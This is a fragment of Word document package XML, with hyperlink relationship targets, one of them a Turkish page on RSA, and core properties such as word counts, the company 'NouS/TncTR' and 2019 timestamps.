Target="http://bilgisayarkavramlari.sadievrenseker.com/2008/03/19/rsa/"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hyperlink" Target="https://tr.wikipedia.org/wiki/%C4%B0ngilizc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EA64-2E1E-419F-BCA9-0B44B14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9</Pages>
  <Words>199829</Words>
  <Characters>1139029</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>9491</Lines>
  <Paragraphs>2672</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company>NouS/TncTR</Company>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>13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cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-05-29T18:37:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-05-29T19:20:00Z</dcterms:modified>
</cp:coreProperties>
</file>